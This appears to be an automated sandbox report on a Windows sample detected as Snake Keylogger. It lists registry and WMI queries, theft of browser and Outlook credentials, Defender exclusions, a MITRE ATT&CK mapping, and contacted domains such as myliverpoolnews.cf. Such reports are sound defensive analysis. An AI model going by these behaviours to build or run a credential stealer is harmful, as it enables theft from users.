                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Snake Keylogger
Source: Yara match | File source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\lfQuSBwdSf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality:

Yara detected Snake Keylogger
Source: Yara match | File source: 00000015.00000002.485923538.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.541864387.0000000004A72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.517681508.0000000004965000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 23.2.svchost.exe.4a72390.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4ad53b0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4ad53b0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.49c8f18.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.4965ef8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.lfQuSBwdSf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.4965ef8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.4a72390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.49c8f18.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools21 | OS Credential Dumping1 | File and Directory Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder11 | Process Injection111 | Obfuscated Files or Information1 | LSASS Memory | System Information Discovery23 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder11 | Software Packing1 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp1 | NTDS | Security Software Discovery241 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Process Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading221 | Cached Domain Credentials | Virtualization/Sandbox Evasion251 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion251 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection111 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Network Configuration Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Behavior Graph ID: 383847 | Sample: lfQuSBwdSf.exe | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100

Graph nodes recovered from the (not reproduced) graph image:

Start
  DNS/IP: checkip.dyndns.org; freegeoip.app; checkip.dyndns.com
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Snake Keylogger; 4 other signatures
  Started: lfQuSBwdSf.exe (18 7); svchost.exe (3); svchost.exe; 11 other processes

lfQuSBwdSf.exe (18 7)
  DNS/IP: checkip.dyndns.org; myliverpoolnews.cf 104.21.56.119, 443, 49700, 49701 CLOUDFLARENETUS United States; checkip.dyndns.com
  Dropped: C:\Windows\Cursors\...\svchost.exe, PE32; C:\Windows\...\svchost.exe:Zone.Identifier, ASCII
  Signatures: May check the online IP address of the machine; Creates an autostart registry key pointing to binary in C:\Windows; Adds a directory exclusion to Windows Defender; Drops PE files with benign system names
  Started: lfQuSBwdSf.exe; WerFault.exe; cmd.exe (1); 3 other processes

svchost.exe (3)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to delay execution (extensive OutputDebugStringW loop); Injects a PE file into a foreign processes

svchost.exe
  Signatures: Hides threads from debuggers
  Started: powershell.exe; powershell.exe; powershell.exe

11 other processes
  DNS/IP: 127.0.0.1 unknown unknown
  Signatures: Changes security center settings (notifications, updates, antivirus, firewall)

lfQuSBwdSf.exe (child)
  DNS/IP: checkip.dyndns.org; checkip.dyndns.com 162.88.193.70, 49720, 49722, 49726 DYNDNSUS United States; 2 other IPs or domains
  Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc)

WerFault.exe
  Dropped: C:\ProgramData\Microsoft\...\Report.wer, Little-endian

cmd.exe (1)
  Started: conhost.exe; timeout.exe (1)

powershell.exe (each of the three)
  Started: conhost.exe

3 other processes
  Started: conhost.exe; conhost.exe; conhost.exe


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
lfQuSBwdSf.exe | 25% | Virustotal |
lfQuSBwdSf.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
lfQuSBwdSf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | 100% | Joe Sandbox ML |
C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx

Unpacked PE Files

Source | Detection | Scanner | Label
21.2.lfQuSBwdSf.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen

Domains

Source | Detection | Scanner | Label
myliverpoolnews.cf | 2% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html | 0% | Avira URL Cloud | safe
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html | 0% | Avira URL Cloud | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/featuresnC0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe

Domains and IPs

Contacted Domains

Name               | IP             | Active  | Malicious | Antivirus Detection | Reputation
myliverpoolnews.cf | 104.21.56.119  | true    | false     |                     | unknown
freegeoip.app      | 172.67.188.154 | true    | false     |                     | unknown
checkip.dyndns.com | 162.88.193.70  | true    | false     |                     | unknown
checkip.dyndns.org | unknown        | unknown | true      |                     | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html | false | Avira URL Cloud: safe | unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | Avira URL Cloud: safe | unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
                                          • URL Reputation: safe
                                          unknown
                                          https://www.liverpool.com/all-about/ozan-kabaklfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                            high
                                            https://s2-prod.mirror.co.uk/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/all-about/champions-leaguelfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/all-about/curtis-joneslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
